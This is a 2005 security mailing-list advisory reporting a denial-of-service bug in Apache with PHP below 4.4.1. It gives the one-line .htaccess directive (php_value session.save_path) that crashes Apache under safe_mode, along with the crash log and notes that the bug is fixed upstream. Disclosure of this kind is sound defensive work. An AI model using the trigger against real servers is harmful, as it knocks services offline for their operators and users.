php < 4.4.1 htaccess apache dos
- To: vuldb@xxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxx, vuln@xxxxxxxxxx, moderators@xxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx, submissions@xxxxxxxxxxxxxxxxxxxxxxx, news@xxxxxxxxxxxxxx, xforce@xxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, vulnwatch@xxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, Eric Romang <eromang@xxxxxxxxx>
- Subject: php < 4.4.1 htaccess apache dos
- From: "Eric Romang / ZATAZ.com" <exploits@xxxxxxxxx>
- Date: Mon, 24 Oct 2005 09:36:38 +0200
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
- Organization: ZATAZ.com
- User-agent: Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.12) Gecko/20050920
Hello,
Here under some stuff to dos apache + php just through an htaccess.
* With .htaccess method :
If you have into your php.ini -> safe_mode = On
Simply put a .htaccess file on the root directory of your website
with this content :
php_value session.save_path /var/www/somewherehowexist
Apache segfault with :
[Fri Sep 30 10:33:11 2005] [notice] child pid 17743 exit signal
Trace/breakpoint trap (5)
There was a bug in the apache2handler SAPI, sapi_apache2.c file, that
made this segfault here possible, the bug now is fixed upstream and
5.1.0 final, 4.4.1 final and the next 5.0.X release will have the patch.
Also work with session.save_path into a VirtualHost.
Gentoo bug report :
http://bugs.gentoo.org/show_bug.cgi?id=107602
and
http://bugs.gentoo.org/show_bug.cgi?id=98871
Regards.